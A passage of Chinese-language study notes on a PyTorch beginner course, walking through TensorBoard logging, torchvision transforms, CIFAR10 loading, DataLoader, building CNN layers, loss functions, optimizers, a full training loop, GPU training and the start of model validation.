    def add_image(    self, tag, img_tensor, global_step=None, walltime=None, dataformats="CHW"):    """Add image data to summary.    Note that this requires the ``pillow`` package.                                        Args:        tag (str): Data identifier        img_tensor (torch.Tensor, numpy.ndarray, or string/blobname): Image data        global_step (int): Global step value to record        walltime (float): Optional override default walltime (time.time())          seconds after epoch of event        dataformats (str): Image data format specification of the form          CHW, HWC, HW, WH, etc.    Shape:        img_tensor: Default is :math:`(3, H, W)`. You can use ``torchvision.utils.make_grid()`` to        convert a batch of tensor into 3xHxW format or call ``add_images`` and let us do the job.        Tensor with :math:`(1, H, W)`, :math:`(H, W)`, :math:`(H, W, 3)` is also suitable as long as        corresponding ``dataformats`` argument is passed, e.g. ``CHW``, ``HWC``, ``HW``.                                        Examples::                                            from torch.utils.tensorboard import SummaryWriter        import numpy as np        img = np.zeros((3, 100, 100))        img[0] = np.arange(0, 10000).reshape(100, 100) / 10000        img[1] = 1 - np.arange(0, 10000).reshape(100, 100) / 10000                                            img_HWC = np.zeros((100, 100, 3))        img_HWC[:, :, 0] = np.arange(0, 10000).reshape(100, 100) / 10000        img_HWC[:, :, 1] = 1 - np.arange(0, 10000).reshape(100, 100) / 10000                                            writer = SummaryWriter()        writer.add_image('my_image', img, 0)                                            # If you have non-default dimension setting, set the dataformats argument.        writer.add_image('my_image_HWC', img_HWC, 0, dataformats='HWC')        writer.close()                                        Expected result:                                        .. image:: _static/img/tensorboard/add_image.png       :scale: 50%                                        """

    ​ 从 PIL 到 numpy,需要在 add_image() 中指定 shape 中每一个数字/维表示的含义。dataformats="HWC"(高、宽、通道数)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    from torch.utils.tensorboard import SummaryWriter
    import numpy as np
    from PIL import Image

    writer = SummaryWriter("logs")
    image_path = r"dataset\train\ants\0013035.jpg"
    img_PIL = Image.open(image_path)
    img_array = np.array(img_PIL)
    print(type(img_array))
    print(img_array.shape)

    writer.add_image("test", img_array, 2, dataformats="HWC")
    for i in range(100):
    writer.add_scalar("y=2x", 2 * i, i)

    writer.close()

    png

    Transforms 的使用

    transforms 是一个工具包,读入图片经过 transforms 后产生结果。

    transforms.ToTensor() 将 Image 格式转换成 tensor 格式。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from torchvision import transforms
    from PIL import Image
    from torch.utils.tensorboard import SummaryWriter

    img_path = r"dataset/train/ants/0013035.jpg"
    img = Image.open(img_path)

    writer = SummaryWriter("logs")

    # transforms 该如何被使用
    tensor_trans = transforms.ToTensor()
    tensor_img = tensor_trans(img)

    print(tensor_img)

    writer.add_image("Tensor_img", tensor_img)

    writer.close()

    常见的 Transforms(一)

    讲了 transforms.Normalize 的用法。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    class Normalize(torch.nn.Module):
    """Normalize a tensor image with mean and standard deviation. 使用平均值和标准偏差归一化张量图像
    This transform does not support PIL Image.
    Given mean: ``(mean[1],...,mean[n])`` and std: ``(std[1],..,std[n])`` for ``n``
    channels, this transform will normalize each channel of the input
    ``torch.*Tensor`` i.e.,
    ``output[channel] = (input[channel] - mean[channel]) / std[channel]``

    .. note::
    This transform acts out of place, i.e., it does not mutate the input tensor.

    Args:
    mean (sequence): Sequence of means for each channel.
    std (sequence): Sequence of standard deviations for each channel.
    inplace(bool,optional): Bool to make this operation in-place.

    """
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    from PIL import Image
    from torch.utils.tensorboard import SummaryWriter
    from torchvision import transforms

    writer = SummaryWriter("logs")
    img = Image.open("images/pytorch.png")
    print(img)

    # ToTensor
    trans_totensor = transforms.ToTensor()
    img_tensor = trans_totensor(img)
    writer.add_image("ToTensor", img_tensor)

    # Normalize
    print(img_tensor[0][0][0])
    trans_norm = transforms.Normalize([6, 3, 2], [9, 3, 5])
    img_norm = trans_norm(img_tensor)
    print(img_norm[0][0][0])
    writer.add_image("Normalize", img_norm, 1)

    png

    常见的 Transforms(二)

    Resize 调整图像大小。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # Resize
    print(img.size)
    trans_resize = transforms.Resize((512, 512))
    # img PIL -> resize -> img_resize PIL
    img_resize = trans_resize(img)
    # img_resize PIL -> totensor -> img_resize tensor
    img_resize = trans_totensor(img_resize)
    writer.add_image("Resize", img_resize, 0)
    print(img_resize)

    png


    Compose: 将transforms列表里面的transform操作进行遍历。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    class Compose:
    """Composes several transforms together. This transform does not support torchscript.
    Please, see the note below.

    Args:
    transforms (list of ``Transform`` objects): list of transforms to compose.

    Example:
    >>> transforms.Compose([
    >>> transforms.CenterCrop(10),
    >>> transforms.PILToTensor(),
    >>> transforms.ConvertImageDtype(torch.float),
    >>> ])

    .. note::
    In order to script the transformations, please use ``torch.nn.Sequential`` as below.

    >>> transforms = torch.nn.Sequential(
    >>> transforms.CenterCrop(10),
    >>> transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
    >>> )
    >>> scripted_transforms = torch.jit.script(transforms)

    Make sure to use only scriptable transformations, i.e. that work with ``torch.Tensor``, does not require
    `lambda` functions or ``PIL.Image``.

    """
    1
    2
    3
    4
    5
    6
    # Compose - resize - 2
    trans_resize_2 = transforms.Resize(512)
    # PIL -> PIL -> tensor
    trans_compose = transforms.Compose([trans_resize_2, trans_totensor])
    img_resize_2 = trans_compose(img)
    writer.add_image("Resize", img_resize_2, 1)

    ​ 相当于先缩放 trans_resize_2,再转换成 tensor 类型 trans_totensor


    RandomCrop 随机裁剪

    1
    2
    3
    4
    5
    6
    # RandomCrop
    trans_random = transforms.RandomCrop([32, 64])
    trans_compose_2 = transforms.Compose([trans_random, trans_totensor])
    for i in range(10):
    img_crop = trans_compose_2(img)
    writer.add_image("RandomCropHW", img_crop, i)

    png

    torchvision 中的数据集使用

    ​ 在官网上查看 torchvision.datasets 的用法

    ​ 选用 CIFAR10 数据集,读入 train_settest_set

    1
    2
    train_set = torchvision.datasets.CIFAR10(root="./dataset", train=True, transform=dataset_transform, download=True)
    test_set = torchvision.datasets.CIFAR10(root="./dataset", train=False, transform=dataset_transform, download=True)

    ​ 如果选择 download=True,会检查并验证 root 中是否存在数据集且是否完整,若没有,则会下载:

    1
    2
    3
    C:\Users\gzjzx\anaconda3\python.exe D:/Study/1st-year-master/XiaoTuDui/Test/P10_dataset_transform.py
    Downloading https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz to ./dataset\cifar-10-python.tar.gz
    1%| | 1114112/170498071 [00:40<48:11, 58582.60it/s]

    ​ 可以将网址 https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz 复制到迅雷中由训练代下载,速度会快,将下载好的数据库拷贝回去。

    1
    2
    3
    Using downloaded and verified file: ./dataset\cifar-10-python.tar.gz
    Extracting ./dataset\cifar-10-python.tar.gz to ./dataset
    Files already downloaded and verified

    ​ 根据官网 CIFAR-10 and CIFAR-100 datasets (toronto.edu) 对数据库的描述,查看数据信息:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    print(test_set[0])
    print(test_set.classes)

    img, target = test_set[0]
    print(img)
    print(target)
    print(test_set.classes[target])
    # img.show()
    print(test_set[0])

    # 在 TensorBoard 中查看数据集中前 10 张图
    writer = SummaryWriter("p10")
    for i in range(10):
    img, target = test_set[i]
    writer.add_image("test_set", img, i)

    writer.close()

    png

    DataLoader 的使用

    png

    • Pytorch 有两个类:
      • Dataset: 提供一种方式去获取数据及其标签
        • 如何获取每一个数据及其标签
        • 告诉我们总共有多少数据
      • DataLoader: 为后面的网络提供不同的数据形式

    DataLoader 的使用:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import torchvision

    # 准备的测试数据集
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    test_data = torchvision.datasets.CIFAR10("./dataset", train=False, transform=torchvision.transforms.ToTensor())

    test_loader = DataLoader(dataset=test_data, batch_size=4, shuffle=True, num_workers=0, drop_last=False)

    # 测试数据集中第一张图片及 target
    img, target = test_data[0]
    print(img.shape)
    print(target)

    writer = SummaryWriter("dataloader")
    step = 0
    for data in test_loader:
    imgs, targets = data
    # print(imgs.shape)
    # print(targets)
    writer.add_images("test_data", imgs, step)
    step += 1

    writer.close()

    test_loader = DataLoader(dataset=test_data, batch_size=4, shuffle=True, num_workers=0, drop_last=False)

    • dataset=test_data,读入 test_data 的数据集
    • batch_size=4,每次读入 4 张图片
    • shuffle=True,打乱图片顺序
    • drop_last=False,数据集数量如果不能被 batch_size 整除,要丢弃最后一块吗?否

    png

    神经网络的基本骨架-nn.Module的使用

    ​ 查看帮助文档:

    ​ 对于神经网络的前向传播,input-forward-output, 自行设计一个神经网络的类,继承 nn.Moudle:初始化时,super(Model, self).__init__()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import torch.nn as nn
    import torch.nn.functional as F

    class Model(nn.Module):
    def __init__(self):
    super(Model, self).__init__()
    self.conv1 = nn.Conv2d(1, 20, 5)
    self.conv2 = nn.Conv2d(20, 20, 5)

    def forward(self, x):
    x = F.relu(self.conv1(x))
    return F.relu(self.conv2(x))

    ​ 设计一个最简单的函数,让 output 为 input 的加 1:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import torch
    from torch import nn

    class MyClass(nn.Module):
    def __init__(self):
    super().__init__()

    def forward(self, input):
    output = input + 1
    return output

    myClass = MyClass()
    input = torch.tensor(1.0)
    output = myClass(input)
    print(output)
    1
    tensor(2.)

    土堆说卷积操作(可选看)

    ​ 大概讲了卷积操作 torch.nn.functional.conv2dstridepadding 的含义。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import torch
    import torch.nn.functional as F

    input = torch.tensor([[1, 2, 0, 3, 1],
    [0, 1, 2, 3, 1],
    [1, 2, 1, 0, 0],
    [5, 2, 3, 1, 1],
    [2, 1, 0, 1, 1]])

    kernel = torch.tensor([[1, 2, 1],
    [0, 1, 0],
    [2, 1, 0]])

    input = torch.reshape(input, (1, 1, 5, 5))
    kernel = torch.reshape(kernel, (1, 1, 3, 3))

    print(input.shape)
    print(kernel.shape)

    output = F.conv2d(input, kernel, stride=1)
    print(output)

    output2 = F.conv2d(input, kernel, stride=2)
    print(output2)

    output3 = F.conv2d(input, kernel, stride=1, padding=1)
    print(output3)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    torch.Size([1, 1, 5, 5])
    torch.Size([1, 1, 3, 3])
    tensor([[[[10, 12, 12],
    [18, 16, 16],
    [13, 9, 3]]]])
    tensor([[[[10, 12],
    [13, 3]]]])
    tensor([[[[ 1, 3, 4, 10, 8],
    [ 5, 10, 12, 12, 6],
    [ 7, 18, 16, 16, 8],
    [11, 13, 9, 3, 4],
    [14, 13, 9, 7, 4]]]])

    神经网络-卷积层

    官方文档:

    torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', device=None, dtype=None)

    • in_channels (int) – Number of channels in the input image 输入图像中的通道数
    • out_channels (int) – Number of channels produced by the convolution 卷积产生的通道数
    • kernel_size (int or tuple) – Size of the convolving kernel 卷积核的大小
    • stride (int or tuple, optional) – Stride of the convolution. Default: 1
    • padding (int, tuple or str, optional) – Padding added to all four sides of the input. Default: 0

    较少用:

    • padding_mode (str, optional) – 'zeros', 'reflect', 'replicate' or 'circular'. Default: 'zeros'
    • dilation (int or tuple, optional) – Spacing between kernel elements. Default: 1 内核元素之间的间距。默认值:1
    • groups (int, optional) – Number of blocked connections from input channels to output channels. Default: 1 从输入通道到输出通道的阻塞连接数。默认值:1
    • bias (bool, optional) – If True, adds a learnable bias to the output. Default: True 如果为“True”,则在输出中添加可学习的偏差。

    png

    ​ 输入/输出的大小计算公式,如果看论文时论文没有阐明,可以用这个公式推断出具体的参数。


    导入相关库:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import torch
    import torchvision
    from torch import nn
    from torch.nn import Conv2d
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    dataset = test_data = torchvision.datasets.CIFAR10("./dataset",
    train=False,
    transform=torchvision.transforms.ToTensor(),
    download=True)
    dataloader = DataLoader(dataset, batch_size=64)

    设计卷积神经网络结构:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.conv1 = Conv2d(in_channels=3, out_channels=6, kernel_size=3, stride=1, padding=0)

    def forward(self, x):
    x = self.conv1(x)
    return x


    myClass = MyClass()
    print(myClass)

    执行操作并输出到 Tensorboard 上:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    writer = SummaryWriter("./logs")
    step = 0
    for data in dataloader:
    imgs, targets = data
    output = myClass(imgs)
    print(imgs.shape)
    print(output.shape)
    # torch.Size([64, 3, 32, 32])
    writer.add_images("input", imgs, step)
    # torch.Size([64, 6, 30, 30]) -> [xxx, 3, 30, 30]
    output = torch.reshape(output, (-1, 3, 30, 30))
    writer.add_images("output", output, step)
    step += 1

    png

    神经网络-最大池化的使用

    Max-pooling 是 下采样的一种。

    官方文档:

    torch.nn.MaxPool2d(kernel_size, stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)

    • kernel_size (Union[int, Tuple[int, int]**]) – the size of the window to take a max over 要放大的窗口的大小
    • stride (Union[int, Tuple[int, int]**]) – the stride of the window. Default value is kernel_size 窗户的跨步
    • padding (Union[int, Tuple[int, int]**]) – Implicit negative infinity padding to be added on both sides 要在两侧添加的隐式负无穷大填充
    • dilation (Union[int, Tuple[int, int]**]) – a parameter that controls the stride of elements in the window 一个参数,用于控制窗口中元素的步幅
    • return_indices (bool) – if True, will return the max indices along with the outputs. Useful for torch.nn.MaxUnpool2d later 如果为“True”,则将返回最大索引以及输出
    • ceil_mode (bool) – when True, will use ceil instead of floor to compute the output shap 当为True时,将使用ceil(向上取整)而不是floor(向下取整)来计算输出形状

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
import torch
import torchvision
from torch import nn
from torch.nn import MaxPool2d
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter

dataset = torchvision.datasets.CIFAR10("./dataset",
                                       train=False,
                                       transform=torchvision.transforms.ToTensor(),
                                       download=True)
dataloader = DataLoader(dataset, batch_size=64)

# A hand-made example: MaxPool2d needs a float input of shape (N, C, H, W)
input = torch.tensor([[1, 2, 0, 3, 1],
                      [0, 1, 2, 3, 1],
                      [1, 2, 1, 0, 0],
                      [5, 2, 3, 1, 1],
                      [2, 1, 0, 1, 1]], dtype=torch.float32)
input = torch.reshape(input, (-1, 1, 5, 5))  # reshape returns a new tensor, so assign it back
print(input.shape)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.maxpool1 = MaxPool2d(kernel_size=3, ceil_mode=False)

    def forward(self, input):
        output = self.maxpool1(input)
        return output


myClass = MyClass()

writer = SummaryWriter("./logs_maxpool")
step = 0

for data in dataloader:
    imgs, targets = data
    writer.add_images("input", imgs, step)
    output = myClass(imgs)
    writer.add_images("output", output, step)
    step += 1

writer.close()


Neural Networks: Non-linear Activations

Official documentation:

import torch
import torchvision
from torch import nn
from torch.nn import ReLU
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter

input = torch.tensor([[1, -0.5],
                      [-1, 3]])

input = torch.reshape(input, (-1, 1, 2, 2))  # reshape into the (N, C, H, W) form the module expects
print(input.shape)

dataset = torchvision.datasets.CIFAR10("./dataset", train=False, download=True,
                                       transform=torchvision.transforms.ToTensor())

dataloader = DataLoader(dataset, batch_size=64)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.relu1 = ReLU()

    def forward(self, input):
        output = self.relu1(input)
        return output


myclass = MyClass()

writer = SummaryWriter("./logs_relu")
step = 0
for data in dataloader:
    imgs, targets = data
    writer.add_images("inputs", imgs, global_step=step)
    output = myclass(imgs)
    writer.add_images("output", output, step)
    step += 1

writer.close()
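
The hand-made 2×2 tensor above is reshaped but never actually pushed through the network; one extra line (using the names defined above) shows the element-wise clamping:

print(myclass(input))  # tensor([[[[1., 0.], [0., 3.]]]]): negatives become 0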


Neural Networks: Linear Layers and Other Layers

import torch
import torchvision
from torch import nn
from torch.nn import Linear
from torch.utils.data import DataLoader

dataset = torchvision.datasets.CIFAR10("./dataset", train=False, transform=torchvision.transforms.ToTensor(),
                                       download=True)

dataloader = DataLoader(dataset, batch_size=64)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.linear1 = Linear(196608, 10)

    def forward(self, input):
        output = self.linear1(input)
        return output


myclass = MyClass()

for data in dataloader:
    imgs, targets = data
    print(imgs.shape)             # torch.Size([64, 3, 32, 32])
    output = torch.flatten(imgs)  # flatten the whole batch into one vector
    # output = torch.reshape(imgs, (1, 1, 1, -1))
    print(output.shape)           # torch.Size([196608])
    output = myclass(output)
    print(output.shape)           # torch.Size([10])
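
​ Where does 196608 come from? It is the whole batch flattened: 64 × 3 × 32 × 32 = 196608. Note that the CIFAR-10 test set has 10000 images and 10000 = 156 × 64 + 16, so the last batch flattens to only 16 × 3 × 32 × 32 = 49152 elements and the Linear layer will reject it; creating the DataLoader with drop_last=True avoids this.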

​ See torch.nn — PyTorch 2.0 documentation for more network building blocks.

​ Classic model architectures are also available from Search — Torchvision 0.15 documentation (pytorch.org) and Models and pre-trained weights — Torchvision 0.15 documentation (pytorch.org).

Neural Networks: A Small Hands-On Build and Using Sequential

​ Sequential() combines multiple layers into a single module.

​ We assemble the following network (the CIFAR-10 classifier from the course figure):


import torch
from torch import nn
from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
from torch.utils.tensorboard import SummaryWriter


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.model1 = Sequential(
            Conv2d(3, 32, 5, padding=2),
            MaxPool2d(2),
            Conv2d(32, 32, 5, padding=2),
            MaxPool2d(2),
            Conv2d(32, 64, 5, padding=2),
            MaxPool2d(2),
            Flatten(),
            Linear(1024, 64),
            Linear(64, 10)
        )

    def forward(self, x):
        x = self.model1(x)
        return x


myClass = MyClass()
print(myClass)
input = torch.ones((64, 3, 32, 32))
output = myClass(input)
print(output.shape)

writer = SummaryWriter('../logs_seq')
writer.add_graph(myClass, input)
writer.close()

​ writer.add_graph() renders the complete architecture in TensorBoard.


Loss Functions and Backpropagation

PyTorch has many built-in loss functions; see Search — PyTorch 2.0 documentation.

L1Loss(), MSELoss(), CrossEntropyLoss()

    import torch
    from torch import nn
    from torch.nn import L1Loss, MSELoss

    inputs = torch.tensor([1, 2, 3], dtype=torch.float32)
    targets = torch.tensor([1, 2, 5], dtype=torch.float32)

    inputs = torch.reshape(inputs, (1, 1, 1, 3))
    targets = torch.reshape(targets, (1, 1, 1, 3))

    loss = L1Loss()
    result = loss(inputs, targets)

    loss_mse = MSELoss()
    result_mse = loss_mse(inputs, targets)

    print(result, result_mse)

    x = torch.tensor([0.1, 0.2, 0.3])
    y = torch.tensor([1])
    x = torch.reshape(x, (1, 3))
    loss_cross = nn.CrossEntropyLoss()
    result_cross = loss_cross(x, y)
    print(result_cross)

​ Backpropagating the loss yields the gradient of every parameter in the model: result_loss.backward()

import torch
import torchvision
from torch import nn
from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter

dataset = torchvision.datasets.CIFAR10("../dataset", train=False, transform=torchvision.transforms.ToTensor(),
                                       download=True)

dataloader = DataLoader(dataset, batch_size=1)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.model1 = Sequential(
            Conv2d(3, 32, 5, padding=2),
            MaxPool2d(2),
            Conv2d(32, 32, 5, padding=2),
            MaxPool2d(2),
            Conv2d(32, 64, 5, padding=2),
            MaxPool2d(2),
            Flatten(),
            Linear(1024, 64),
            Linear(64, 10)
        )

    def forward(self, x):
        x = self.model1(x)
        return x


loss = nn.CrossEntropyLoss()
myClass = MyClass()
for data in dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    print(outputs)
    print(targets)
    result_loss = loss(outputs, targets)
    print(result_loss)
    result_loss.backward()

Optimizers

Official documentation:

loss = nn.CrossEntropyLoss()
myClass = MyClass()
optim = torch.optim.SGD(myClass.parameters(), lr=0.01)
for epoch in range(20):
    running_loss = 0.0
    for data in dataloader:
        imgs, targets = data
        outputs = myClass(imgs)
        result_loss = loss(outputs, targets)
        optim.zero_grad()
        result_loss.backward()
        optim.step()
        running_loss = running_loss + result_loss.item()  # .item() keeps a plain number instead of a graph-bearing tensor
    print(running_loss)

​ Take plain stochastic gradient descent as the example: optim = torch.optim.SGD(myClass.parameters(), lr=0.01) takes the model parameters first, then the learning rate.

• Nest the loop inside for epoch in range(20): to run several epochs of optimization.

• Zero the gradients before every descent step: optim.zero_grad()

• Compute the new gradients: result_loss.backward()

• Update the model parameters: optim.step()

​ As a rule, the loss value shrinks with each epoch.
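
Any other optimizer from torch.optim drops in the same way; for example (the learning rate here is an arbitrary illustrative choice):

optim = torch.optim.Adam(myClass.parameters(), lr=1e-3)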

Using and Modifying Existing Network Models

​ Popular models, with and without pretrained weights, are available from Models and pre-trained weights — Torchvision 0.15 documentation (pytorch.org).

• Initialize a VGG-16 with random weights: vgg16_false = torchvision.models.vgg16(pretrained=False)

• Initialize a VGG-16 and download its pretrained weights: vgg16_true = torchvision.models.vgg16(pretrained=True)

• Append a layer to an existing model: vgg16_true.add_module('add_linear', nn.Linear(1000, 10))

• Replace a layer of an existing model: vgg16_false.classifier[6] = nn.Linear(4096, 10)
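
A small sketch of the same two edits on newer torchvision (0.13 and later deprecate pretrained= in favor of weights=; the enum name below comes from that API):

import torchvision
from torch import nn

vgg16_true = torchvision.models.vgg16(weights=torchvision.models.VGG16_Weights.DEFAULT)
vgg16_true.add_module('add_linear', nn.Linear(1000, 10))  # registers an extra named layer (visible in print(vgg16_true))
vgg16_true.classifier[6] = nn.Linear(4096, 10)            # or replace the last classifier layer in place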

A Complete Training Recipe (Part 1)

Put the model definition in a separate model.py file:

# Build the network
import torch
from torch import nn


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.model = nn.Sequential(
            nn.Conv2d(3, 32, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Conv2d(32, 32, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Conv2d(32, 64, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Flatten(),
            nn.Linear(1024, 64),
            nn.Linear(64, 10)
        )

    def forward(self, x):
        x = self.model(x)
        return x


if __name__ == '__main__':
    myClass = MyClass()
    input = torch.ones((64, 3, 32, 32))
    output = myClass(input)
    print(output.shape)

In train.py, set up the loss function, the optimizer, the number of epochs, and the rest of the training loop:

from model import *  # also brings in torch and nn via model.py's own imports
import torchvision

# Prepare the datasets
from torch import nn
from torch.utils.data import DataLoader

train_data = torchvision.datasets.CIFAR10(root='../dataset', train=True, transform=torchvision.transforms.ToTensor(),
                                          download=True)
test_data = torchvision.datasets.CIFAR10(root='../dataset', train=False, transform=torchvision.transforms.ToTensor(),
                                         download=True)
# Dataset sizes
train_data_size = len(train_data)
test_data_size = len(test_data)
print('Training set size: {}'.format(train_data_size))
print('Test set size: {}'.format(test_data_size))

# Load the datasets with DataLoader
train_dataloader = DataLoader(train_data, batch_size=64)
test_dataloader = DataLoader(test_data, batch_size=64)

# Create the network
myClass = MyClass()

# Loss function
loss_fn = nn.CrossEntropyLoss()

# Optimizer
learning_rate = 1e-2
optimizer = torch.optim.SGD(myClass.parameters(), lr=learning_rate)

# Training bookkeeping
total_train_step = 0  # number of training steps so far
total_test_step = 0   # number of test rounds so far
epoch = 10            # number of epochs

# Training
for i in range(epoch):
    print('Epoch {} begins'.format(i + 1))
    # Training steps
    for data in train_dataloader:
        imgs, targets = data
        outputs = myClass(imgs)
        loss = loss_fn(outputs, targets)

        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        total_train_step = total_train_step + 1
        print('Step: {}, Loss: {}'.format(total_train_step, loss.item()))

A Complete Training Recipe (Parts 2 and 3)

from torch.utils.tensorboard import SummaryWriter
from model import *  # also brings in torch and nn via model.py's own imports
import torchvision

# Prepare the datasets
from torch import nn
from torch.utils.data import DataLoader

train_data = torchvision.datasets.CIFAR10(root='../dataset', train=True, transform=torchvision.transforms.ToTensor(),
                                          download=True)
test_data = torchvision.datasets.CIFAR10(root='../dataset', train=False, transform=torchvision.transforms.ToTensor(),
                                         download=True)
# Dataset sizes
train_data_size = len(train_data)
test_data_size = len(test_data)
print('Training set size: {}'.format(train_data_size))
print('Test set size: {}'.format(test_data_size))

# Load the datasets with DataLoader
train_dataloader = DataLoader(train_data, batch_size=64)
test_dataloader = DataLoader(test_data, batch_size=64)

# Create the network
myClass = MyClass()

# Loss function
loss_fn = nn.CrossEntropyLoss()

# Optimizer
learning_rate = 1e-2
optimizer = torch.optim.SGD(myClass.parameters(), lr=learning_rate)

# Training bookkeeping
total_train_step = 0  # number of training steps so far
total_test_step = 0   # number of test rounds so far
epoch = 10            # number of epochs

# TensorBoard
writer = SummaryWriter('../logs_train')

# Training
for i in range(epoch):
    print('Epoch {} begins'.format(i + 1))
    # Training steps
    myClass.train()
    for data in train_dataloader:
        imgs, targets = data
        outputs = myClass(imgs)
        loss = loss_fn(outputs, targets)

        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        total_train_step = total_train_step + 1
        if total_train_step % 100 == 0:
            print('Step: {}, Loss: {}'.format(total_train_step, loss.item()))
            writer.add_scalar('train_loss', loss.item(), total_train_step)

    # Evaluation steps
    myClass.eval()
    total_test_loss = 0
    total_accuracy = 0
    with torch.no_grad():
        for data in test_dataloader:
            imgs, targets = data
            outputs = myClass(imgs)
            loss = loss_fn(outputs, targets)

            total_test_loss = total_test_loss + loss.item()  # .item() keeps a plain number

            accuracy = (outputs.argmax(1) == targets).sum()
            total_accuracy += accuracy
    print('Loss on the whole test set: {}'.format(total_test_loss))
    print('Accuracy on the whole test set: {}'.format(total_accuracy / test_data_size))
    writer.add_scalar('test_loss', total_test_loss, total_test_step)
    writer.add_scalar('total_accuracy', total_accuracy / test_data_size, total_test_step)
    total_test_step += 1

    torch.save(myClass, "myClass_{}.pth".format(i))
    # torch.save(myClass.state_dict(), "myClass_{}.pth".format(i))  # weights-only alternative
    print("Model saved")

writer.close()

​ Switch the model between train / eval mode with myClass.train() and myClass.eval(); this matters for layers such as Dropout and BatchNorm.

​ Run evaluation inside with torch.no_grad(): (no parameter updates, no gradient computation, which saves memory).

​ Print the loss value at regular intervals of training steps:

if total_train_step % 100 == 0:
    print('Step: {}, Loss: {}'.format(total_train_step, loss.item()))

​ Compute the accuracy:

    accuracy = (outputs.argmax(1) == targets).sum()
    total_accuracy += accuracy
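
​ A tiny worked example of what these two lines compute (the values are illustrative):

import torch

outputs = torch.tensor([[0.1, 0.9],
                        [0.8, 0.2]])
targets = torch.tensor([1, 0])
print(outputs.argmax(1))                     # tensor([1, 0]): predicted class per row
print((outputs.argmax(1) == targets).sum())  # tensor(2): number of correct predictions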

​ Visualize the training run with SummaryWriter:

    • writer.add_scalar('train_loss', loss.item(), total_train_step)
    • writer.add_scalar('test_loss', total_test_loss, total_test_step)
    • writer.add_scalar('total_accuracy', total_accuracy / test_data_size, total_test_step)


​ Save the model after every epoch:

torch.save(myClass, "myClass_{}.pth".format(i))
# torch.save(myClass.state_dict(), "myClass_{}.pth".format(i))  # weights-only alternative
print("Model saved")

Training on the GPU (Part 1)

The network model can be moved to CUDA:

if torch.cuda.is_available():
    myClass = MyClass()
    myClass = myClass.cuda()  # move the network onto CUDA

The loss function can be moved to CUDA:

# loss function
if torch.cuda.is_available():
    loss_fn = nn.CrossEntropyLoss()
    loss_fn = loss_fn.cuda()

The optimizer cannot be moved; it simply operates on whatever device the parameters live on.

The training and test data can be moved to CUDA:

for data in train_dataloader:
    imgs, targets = data
    if torch.cuda.is_available():
        imgs = imgs.cuda()
        targets = targets.cuda()

for data in test_dataloader:
    imgs, targets = data
    if torch.cuda.is_available():
        imgs = imgs.cuda()
        targets = targets.cuda()


Training on the GPU (Part 2)

Use torch.device() to choose the training device: device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

With multiple GPUs, 'cuda:0' selects GPU number 0, and so on.

Move everything onto the chosen device:

• myClass = myClass.to(device) for the model

• loss_fn = loss_fn.to(device) for the loss function

• and the data inside each loop:

  for data in train_dataloader:
      imgs, targets = data
      imgs = imgs.to(device)
      targets = targets.to(device)

A Complete Model Validation Recipe

Take an already trained model, give it an input, and read off the prediction.

import torch
import torchvision
from PIL import Image
from torch import nn

image_path = '../imgs/dog.png'
image = Image.open(image_path)
image = image.convert('RGB')

transform = torchvision.transforms.Compose([torchvision.transforms.Resize((32, 32)),
                                            torchvision.transforms.ToTensor()])
image = transform(image)
print(image.shape)


class MyClass(nn.Module):
    def __init__(self):
